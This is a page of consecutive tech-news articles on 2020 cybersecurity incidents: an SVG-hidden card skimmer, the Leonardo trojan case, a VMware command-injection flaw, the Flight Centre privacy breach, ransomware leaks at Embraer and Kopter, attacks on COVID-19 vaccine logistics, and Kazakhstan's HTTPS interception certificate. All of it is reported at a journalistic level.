Information Technology

Image via Iconfinder
Cyber-criminals have created a new type of web malware that hides inside images used for social media sharing buttons in order to steal credit card information entered in payment forms on online stores.
The malware, known as a web skimmer, or Magecart script, was spotted on online stores in June and September this year by Dutch security firm Sanguine Security (SangSec).
While this particular form isn’t widely deployed, its discovery suggests that Magecart gangs are constantly evolving their bag of tricks.
Steganography and malware attacks
At the technical level, this particular script uses a technique known as steganography. Steganography refers to hiding information inside another format (i.e., text inside images, images inside videos, etc.).
In the world of malware attacks, steganography is typically employed as a way to sneak malicious code past security scanners by placing the bad code inside seemingly innocent files.
Over the past years, the most common form of steganography attacks has been to hide malicious payloads inside image files, usually stored in PNG or JPG formats.
Malware gangs would add the malicious code inside the image, the image would be downloaded on a host system, extracted by another of the malware gang’s components, and then executed.

In the world of web-based skimmers (Magecart scripts), steganography works because most web skimmers are typically hidden in JavaScript code and not inside image files.
However, the technique has slowly been seeing some adoption among web skimmer gangs, with past steganographic attacks using site logos, product images, or favicons to hide payloads.
Malicious code hidden in SVG images
But as steganography use grew, security firms also started looking and analyzing image files as a place they could find irregularities or hidden web skimmer payloads.
The interesting detail in these recent attacks is that the malicious code wasn’t hidden inside PNG or JPG files but in SVG files, a type of image file for loading vector-based images.
Vector images load and drawn grahics with the help of coordinates and mathematical functions, and they’re a text-based format, rather than a binary format, which, in theory, would make the detection of malicious payloads even easier than with PNG and JPG files.
However, SangSec says the threat actors were very clever when they designed their payload.
“The malicious payload assumes the form of an HTML < svg > element, using the < path > element as a container for the payload. The payload itself is concealed utilizing syntax that strongly resembles correct use of the < svg > element,” SangSec said in a report last week.
“While skimmers have added their malicious payload to benign files like images in the past, this is the first time that malicious code has been constructed as a perfectly valid image. The result is that security scanners can no longer find malware just by testing for valid syntax,” the company added.
SangSec said it found malware gangs testing this technique in June, and on live e-commerce sites in September, with the malicious payload hidden inside social media sharing icons for sites like Google, Facebook, Twitter, Instagram, YouTube, and Pinterest.
On infected stores, once users accessed the checkout page, a secondary component (called a decoder) would read the malicious code hidden inside the social sharing icons and then load a keylogger that recorded and exfiltrated card details entered in the payment form.
User protections
End users have very few options available at their disposal when it comes to web skimmer attacks, as this type of code is usually invisible to them and extremely hard to detect, even for professionals.
Furthermore, users shopping on a site have no way at their disposal to know how secure a site really is, and if the store owner invests in security at all.
The simplest way shoppers can protect themselves from web skimmer attacks is to use virtual cards designed for one-time payments.
These cards are currently provided by some banks or payment apps, and they’re currently the best way to deal with web-based skimming as even if attackers manage to record transaction details, the card data is useless as it was generated for one transaction only. More

Italian police have arrested a former employee of Leonardo SpA and another individual in connection to the theft of sensitive corporate and military information.

The Naples Public Prosecutor’s Office said on November 5 that an ongoing cyberattack was maintained against the Aerostructures and Aircraft Division of Leonardo SpA, one of the largest defense contractors worldwide.
Headquartered in Rome, Italy, the company accounts for over 49,000 employees and maintains a presence in its home location, the UK, US, and Poland across the aerospace, military, and security sectors. 
See also: Working from home causes surge in security breaches, staff ‘oblivious’ to best practices
Last week, Italian law enforcement said the pair — one of which was an IT manager for Leonardo — were arrested for allegedly compromising the corporation’s network by executing malware able to quietly exfiltrate sensitive data. 
According to the Naples office, the duo deployed malware dubbed cftmon.exe on 94 workstations, of which 33 were located at the company plant in Pomigliano D’Arco. The malware, described as a Trojan variant, was loaded through USB sticks plugged into the workstations and remained undetected from roughly May 2015 to January 2017. 
In 2017, Leonardo’s cybersecurity team detected anomalous network traffic originating from these workstations which were directed to a command-and-control (C2) server, fujinama.altervista.org. The web domain has since been seized by Italian police. 

The malware was able to silently exfiltrate classified and valuable corporate data, including military information, and maintained persistence by automatically executing on each workstation at startup.
CNET: Your Amazon Echo will get Sidewalk soon if it hasn’t yet. Here’s why it matters
Originally, the defense contractor believed that the data exfiltration was a small and rather insignificant incident, but Italian law enforcement says a subsequent investigation revealed a “much more extensive and severe scenario.”
Reconstructions of the incident performed by the police suggest that up to 10GB of data — or 100,000 files — was stolen during the campaign relating to security and defense strategy, HR, product distribution, and component design for civil and military aircraft, as well as employee credentials.
Italian prosecutors have accused the pair of “abusive access to computer systems, unlawful interception of electronic communications, and [the] unlawful processing of personal data.”
TechRepublic: Most used passwords for 2020: The internet’s favorite curse word, name, food, and team
The head of Leonardo’s cybersecurity team has also been placed under house arrest for allegedly misleading and hindering investigative efforts concerning the cyberattack. 
In a statement, Leonardo said that the arrests relate to an individual who is not an employee of the company, as well as a “non-executive” former member of staff. 
“The company, which is obviously the injured party in this affair, has provided maximum cooperation since the beginning and will continue to do so to enable the investigators to clarify the incident, and for its own protection,” Leonardo added.
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Image: Tanguy Keryhuel, Mark Basarab, ZDNet
The US National Security Agency has published a security alert today urging companies to update VMWare products for a vulnerability that is currently exploited by “Russian state-sponsored malicious cyber actors.”

The vulnerability tracked as CVE-2020-4006, impacts VMWare endpoint and identity management products, often deployed in enterprise and government networks.
The affected products, listed below, allow system administrators to manage large fleets of virtualized workstations, their authentication procedures, and the apps installed on each VM.
VMware Workspace ONE Access (Access) 20.01 and 20.10on Linux
VMware Workspace ONE Access Connector (Access Connector)
VMware Identity Manager (vIDM) 3.3.1, 3.3.2, and 3.3.3on Linux
VMware Identity Manager Connector (vIDM Connector) 3.3.1, 3.3.2, 3.3.3, 19.03
VMware Cloud Foundation 4.x
vRealize Suite Lifecycle Manager 8.x
VMWare warned customers last month, on November 23, that these products contained a major security bug and published mitigations and workarounds to prevent attacks.
On Friday, VMWare released official patches and credited NSA analysts for reporting the issue to its security team.
The NSA has also issued its own security alert, urging government organizations to patch their VMWare products amid ongoing attacks from Russian hackers.
“This advisory emphasizes the importance for National Security System (NSS), Department of Defense (DoD), and Defense Industrial Base (DIB) system administrators to apply vendor-provided patches to affected VMware identity management products,” the NSA said in a press release.
How CVE-2020-4006 works

At its core, CVE-2020-4006 is a basic “command injection” vulnerability that allows attackers to execute OS-level commands.
The vulnerability is not extremely dangerous because it can only be exploited after an attacker has authenticated on a WorkspaceONE web-based dashboard.
But if an attacker is in possession of valid credentials, the vulnerability can be used to take full control over any unpatched VMWare Workspace ONE system.

Image: NSA
The VMWare Workspace ONE web-based dashboard is typically used by system administrators to manage the settings of their virtualized workstations.
In most cases, the dashboard is available only via internal networks, but the dashboard can also be hosted over the internet in case administrators need to access their enterprise management tools from home, or if they need to manage networks in remote work points.
Many system administrators might play down this vulnerability because attackers first need access to valid Workspace ONE credentials, and then they need access to the web dashboard itself, which in some cases might be available only on internal networks (intranets).
However, things are never this simple.
“An attacker can achieve these prerequisites by using varieties of methods such as gathering credentials via Phishing, purchasing credentials from third-party sites, or by brute forcing credentials,” Mark Arena, CEO of cyber-security firm Intel 471, told ZDNet.
“Intel 471 considers this a medium risk issue due to the possibility of arbitrary command execution on the underlying operating systems with unrestricted privileges offset by the required authentication and adjacent network access,” Arena added.
Russian hackers planting web shells, pivoting to other systems
But despite these requirements, the NSA said it is aware of instances where Russian state-sponsored hackers have managed to obtain credentials for the VMWare Workspace ONE web panel and have integrated this bug into their attacks and used it to pivot laterally inside networks and escalate the access they had to a hacked organization.
According to the NSA, in the attacks was aware, the hackers installed a web shell on the VMWare Workspace ONE system and then generated SAML credentials for themselves.
The hackers then used the SAML credentials to access and steal sensitive data from the victim company’s Microsoft ADFS (Active Directory Federation Services) servers.
The NSA did not name which of the many Russian state-sponsored groups has been abusing this VMWare bug but warned organizations not to take CVE-2020-4006 lightly.
“NSA strongly recommends that NSS, DoD, and DIB system administrators apply the vendor-issued patch as soon as possible,” the agency said.
Contacted for comment, VMWare also urged customers to apply the patches released on Friday.

Image: NSA More

The Australian Information Commissioner and Privacy Commissioner Angelene Falk has handed down a determination that Flight Centre breached the privacy of 6,918 customers when it held its “design jam” event across the weekend of March 24 to March 26 in 2017.
On the first day of the event, Flight Centre handed a data set containing production data from the 2015 and 2016 calendar years to the 16 teams competing in the event, which consisted of 90 people in total.
The data set had 106 million rows of data, with the company believing it had obfuscated personal information of its customers, leaving only the customer’s year of birth, postcode, gender, and booking information. In the determination made by Falk, Flight Centre had its business intelligence and Australian infosec teams, as well as event coordinators review the first 1,000 rows of data to confirm there was no sensitive information in the file.
However, 36 hours after the event had begun, a free text field under a column called “ProductName” was found by one of the participants to contain credit card information.
Flight Centre then reviewed the file and found it contained 4,011 credit cards and 5,092 passport numbers affecting 6,918 people, as well as 475 usernames and passwords to mostly vendor portals. 757 dates of birth were also identified.
Upon learning of the breach, the company prevented access to the file and truncated the column to 10 characters, received verbal confirmation from participants that they had destroyed all copies of the file, and began a post-incident review. Those who had their payment or passport details breached were notified by the company, offered free identity theft and credit monitoring coverage for a year, and Flight Centre coughed up for the cost of replacing passports when customers opted for it.
Falk said that Flight Centre determined it was a low-risk incident because it involved no intrusion, the incident was not malicious, a known number of third parties had access to data, and there was no evidence of misuse.

The heart of the breach was Flight Centre having no technical controls to prevent travel consultants from entering passport information and credit card details into a free text field other than complying to company policy, Falk wrote.
“The absence of technical controls to prevent or detect such incorrect storage caused an inherent data security risk in terms of how this kind of personal information was protected by the respondent immediately prior to the data breach,” Falk said.
At the time of the incident, Flight Centre had the ability to detect inappropriate storage of credit card information in some of its systems, but not its quoting, invoicing, or receipting systems. The company now scans on a weekly basis for the storage of payment and passport information in free text fields.
Falk also criticised the company for handing over such a large data set in the first event it had run, and not requiring participants to sign an agreement.
“This determination is a strong reminder for organisations to build privacy by design into new projects involving personal information handling, particularly where large datasets will be shared with third-party suppliers for analysis,” Falk said on Monday.
“Organisations should assume that human errors — such as the inadvertent disclosure of personal information to suppliers — could occur and take steps to prevent them.
“They should also carry out privacy impact assessments for data projects to assist in identifying and addressing all relevant privacy impacts.”
Due to the company reacting swiftly, notifying individuals before the Notifiable Data Breaches Scheme came into force, offering those impacts a number of services, paying for monitoring of the dark web to see if the details were misused, and candour when dealing with her office, Falk said it was not appropriate to take further action other than declaring Flight Centre does not repeat its actions.
Related Coverage More

Image via Embraer
Brazilian company Embraer, considered today’s third-largest airplane maker after Boeing and Airbus, was the victim of a ransomware attack last month.
Today, hackers involved in the intrusion have leaked some of the company’s private files as revenge after the airplane maker refused to negotiate and instead chose to restore systems from backups without paying their ransom demand.
The Embraer files were shared on a website hosted on the dark web, managed by the RansomExx (also known as Defray777) ransomware gang.
Data uploaded on this site included samples of employee details, business contracts, photos of flight simulations, and source code, among others, according to samples reviewed by ZDNet.

Image: ZDNet
Today’s leak confirms that hackers managed to steal data from the company’s servers. Embraer issued a press release last week, admitting to a security breach, but did not confirm that the incident involved neither ransomware nor data theft.
The airplane maker said the attackers had “access to only a single environment,” and that the incident caused only a temporary impact on “some of its operations.”
An Embraer spokesperson did not return a request for comment sent by ZDNet today, following the leak.
RansomExx gets a “leak site”

Embraer is also one of three companies that had their data leaked over the weekend on the RansomExx leak site, launched on Saturday.
The RansomExx gang now joins a long list of ransomware gangs that run leak sites.
Ransomware gangs use leak sites as a way to put pressure on victims. During negotiations, companies are told that if they don’t pay the attacker’s desired ransom demand, the attackers will leak data online as a form of punishment, so it can be downloaded by competitors, or that companies face regulatory punishments in their countries. More

Image: Emin Baycan
As the fight against the coronavirus pandemic has progressed through the research phases to the production of working vaccines against COVID-19, the cyber attacks have followed.
These attacks are nothing new, but they’ve changed focus.
In March and April there were attacks on the US Department Health and Human Services, attacks on one of Czechia’s biggest COVID-19 testing laboratories, and attacks on the World Health Organization and, it seems, Chinese government agencies too.
The Vietnamese government-linked hacking group Ocean Lotus targeted officials in Wuhan, where the virus was first recorded, and the Chinese Ministry of Emergency Management.
Australia and the US, as well as other nations, spoke out against such attacks.
“As Australians and the international community band together to respond to COVID-19, we are concerned that malicious cyber actors are seeking to exploit the pandemic for their own gain,” Australia’s Ambassador for Cyber Affairs, Dr Tobias Feakin told ZDNet in April.
“History will judge harshly those exploiting this crisis for their own objectives.”

But more recently we’ve seen phishing attacks on the vaccine cold chain, the temperature-controlled environment needed to transport and store the vaccine, as well as tax and customs officials, and the manufacturers of cold chain equipment.
All in all, companies in Germany, Italy, South Korea, Czechia, greater Europe, and Taiwan were targeted in that one campaign.
Three state-sponsored hacker groups from Russia and North Korea have targeted seven COVID-19 vaccine makers. China and Iran have also been accused of attacks.
Johnson & Johnson’s CISO said healthcare organisations are seeing cyber attacks from nation-state threat actors “every single minute of every single day”.
Shouldn’t all this be illegal? Well yes, of course the hacking is illegal. But shouldn’t this disruption of medical supplies during a pandemic be a more serious crime? Yes, and in some circumstances, it would be. But not all.
‘It’s against the Geneva Convention!’
The Fourth Geneva Convention, or in full the “Convention (IV) relative to the Protection of Civilian Persons in Time of War, Geneva, 12 August 1949”, is very clear on this sort of thing.
“Civilian hospitals organized to give care to the wounded and sick, the infirm and maternity cases, may in no circumstances be the object of attack, but shall at all times be respected and protected by the Parties to the conflict,” it says in Article 18.
“States which are Parties to a conflict shall provide all civilian hospitals with certificates showing that they are civilian hospitals and that the buildings which they occupy are not used for any purpose which would deprive these hospitals of protection.”
Article 20 goes on to say that “personnel engaged in the search for, removal and transporting of and caring for wounded and sick civilians, the infirm and maternity cases, shall be respected and protected”.
Skipping ahead to Article 23 — the ones in between are about transporting the wounded and sick by land, sea, and air — we get to the protection of medical supply lines.
“Each High Contracting Party [state which is a party to the convention] shall allow the free passage of all consignments of medical and hospital stores and objects necessary for religious worship intended only for civilians of another High Contracting Party, even if the latter is its adversary,” it says.
“It shall likewise permit the free passage of all consignments of essential foodstuffs, clothing and tonics intended for children under fifteen, expectant mothers and maternity cases.”
There are some limits to all of these rules, of course.
One example is that a nation at war can’t just import medical supplies via its enemy to avoid producing them itself, thereby releasing some of its own production capacity for the war effort.
Another is that things like hospitals have to be used solely as hospitals, not “to commit, outside their humanitarian duties, acts harmful to the enemy”. That’s in Article 19.
Minor additions have also been made since 1949, to extend and clarify the protections.
The overall message is therefore clear: Civilian hospitals and medical facilities, their staff, and their medical supply lines, are all off-limits.
The first and second Geneva Conventions relate to the treatment of wounded and sick combatants on land and sea, respectively. The third relates to the treatment of prisoners of war. Again the message is clear: Once combatants are injured or sick or captured, and out of the game, their medical care is not fair game.
For fans of Hogan’s Heroes, “the Geneva Convention” they refer to in that WW2 sitcom is the predecessor of the 1949 convention, the much less-comprehensive “Convention relative to the Treatment of Prisoners of War” of 1929.
Need more convincing? Check out the Customary International Humanitarian Law Database. It lists not just the international treaties but also the relevant national laws and military operations manuals.
‘But we’re not at war!’
The thing is, though, the Geneva Conventions and all these other rules only apply during armed conflict. No war? No Geneva Conventions.
So what about in peacetime?
In a 2015 report [PDF], the snappily-named United Nations Group of Governmental Experts on Developments in the Field of Information and Telecommunications in the Context of International Security (GGE) agreed to 11 norms of responsible state behaviour in cyberspace.
One norm requires states to “guarantee full respect for human rights”, but with a tag that says this includes “the right to freedom of expression”, it’s clear that this is about interfering with the use of the internet itself.
Another norm bans states from conducting or supporting any act which “intentionally damages critical infrastructure or otherwise impairs the use and operation of critical infrastructure to provide services to the public”.
But do medical research facilities count as critical infrastructure? Australia certainly thinks so.
In an official commentary [PDF] on current UN negotiations dated April 16, 2020, Australia noted “with concern” the reports of cyber attacks on critical infrastructure “including healthcare/medical services, facilities and systems, and crisis response organisations”.
“During a pandemic, it is hard to think of an infrastructure more critical than hospitals and health services,” Australia’s cyber negotiator at the UN Johanna Weaver told ZDNet.
Australia’s Critical Infrastructure Centre, part of the Department of Home Affairs, also classifies the health system as critical infrastructure.
Indeed, in March this year a parallel organisation to the GGE, the equally snappily-named UN Open Ended Working Group in the field of information and telecommunications in the context of international security (OEWG), indicated that this belief would be made more formal.
The initial “pre-draft” of its report [PDF] says that “states should not conduct ICT operations intended to disrupt the infrastructure essential to political processes or harm medical facilities”.
A joint proposal [.docx] from Australia, Czechia, Estonia, Japan, Kazakhstan, and the US aims to sharpen that, adding the words: “the OEWG underscored that all states considered medical services and medical facilities to be critical infrastructure for the purposes of [the] norms”.
More broadly, an analysis in March this year by legal advisers from the International Committee of the Red Cross noted that “international law prohibits all states from intervening in the internal affairs of other states”.
“The UK, for example, has expressly stated that this prohibition may also cover acts such as the ‘targeting of essential medical services’,” they wrote.
They also noted that attacks on computer systems essential for the maintenance of public health and safety are banned by the 2001 Budapest Cybercrime Convention, to which 65 nations are signatories.
In the view of most nations, therefore, this latest round of cyber attacks is, or at the very least should be, against international law.
But so what?
If we were at war, charges of committing war crimes could eventually end up being prosecuted in The Hague. But we’re not at war. And in peacetime, the 11 norms are constantly being breached.
Some states don’t just permit the misuse of networks in their territories, they actively encourage it. Some states suppress free speech online. Some states actively disrupt the critical infrastructure of others.
And of course, these cyber attacks on vaccine logistics are happening right now.
So far all we’ve seen happen with such illegal conduct is coordinated diplomatic action. Perhaps during a pandemic, it’s time to put a bit of stick about.

Coronavirus More

Wind develops flag of the Republic of Kazakhstan in background of capital Nur-Sulta
Getty Images/iStockphoto
Under the guise of a “cybersecurity exercise,” the Kazakhstan government is forcing citizens in its capital of Nur-Sultan (formerly Astana) to install a digital certificate on their devices if they want to access foreign internet services.
Once installed, the certificate would allow the government to intercept all HTTPS traffic made from users’ devices via a technique called MitM (Man-in-the-Middle).
Starting today, December 6, 2020, Kazakh internet service providers (ISPs) such as Beeline, Tele2, and Kcell are redirecting Nur-Sultan-based users to web pages showing instructions on how to install the government’s certificate. Earlier this morning, Nur-Sultan residents also received SMS messages informing them of the new rules.

Image supplied
Currently,, Kazakhstan users are reporting issues accessing sites like Twitter, YouTube, and Netflix, unless they install the government’s root certificate.
This is the Kazakh government’s third attempt at forcing citizens to install root certificates on their devices after a first attempt in December 2015 and a second attempt in July 2019.
Both previous attempts failed after browser makers blacklisted the government’s certificates.
Government calls it a cybersecurity training exercise
In a statement published on Friday, Kazakh officials described their efforts to intercept HTTPS traffic as a cybersecurity training exercise for government agencies, telecoms, and private companies.

They cited the fact that cyberattacks targeting “Kazakhstan’s segment of the internet” grew 2.7 times during the current COVID-19 pandemic as the primary reason for launching the exercise.
Officials did not say how long the training exercise will last.
The Kazakh government used a similarly vague statement last year, in 2019, describing its actions as a “security measure to protect citizens.”
2019 interception efforts targeted social media sites
The government’s 2019 HTTPS interception effort targeted 37 domains, all social media and communications websites, such as domains for Facebook, Google, Twitter, Instagram, YouTube, and VK, along with a few smaller sites.
The 2015 attempt targeted all internet traffic for interception, which immediately drew the ire of foreign governments, financial institutions, and telecoms — all of which threatened the Kazakh government with lawsuits for having sensitive traffic and private information intercepted.
Representatives for major browser makers, pivotal in blocking the Kazakh government’s first two attempts to backdoor HTTPS traffic, couldn’t be immediately reached for comment over the weekend, but, as before, they’re expected to block this certificate as well. More

Image: Kopter
Helicopter maker Kopter has fallen victim to a ransomware attack after hackers breached its internal network and encrypted the company’s files.
After Kopter refused to engage with the hackers, the ransomware gang has published on Friday some of the company’s files on the internet.
Many ransomware groups upload and share victim data on special “leak sites” as part of their tactics to put pressure on the hacked companies to either have them come to the negotiation table or force them into paying huge ransom demands.
LockBit ransomware gang takes credit
The Kopter data has been published on a blog hosted on the dark web and operated by the LockBit ransomware gang. Files shared on this site include business documents, internal projects, and various aerospace and defense industry standards.

Image: ZDNet

Image: ZDNet
In an email, the operators of the LockBit ransomware told ZDNet that they breached Kopter’s network last week by exploiting a VPN appliance that used a weak password and did not have two-factor authentication (2FA) enabled.
The LockBit gang also said they operate a web portal on the dark web where they show details to hacked companies about the attack, including a ransom demand. LockBit operators said someone from Kopter accessed the ransom page, but the company did not engage with them in a chat window provided to hacked companies.
Kopter has not publicly disclosed a security breach on its website or via business wires.

A Kopter spokesperson did not return an email seeking comment on the ransomware attack. Phone calls made on Friday also remained unanswered.
The Switzerland-based company was founded in 2007 and is known for its line of small and medium-class civilian helicopters.
In January 2020, Italian aerospace and defense company Leonardo acquired Kopter for an undisclosed sum. More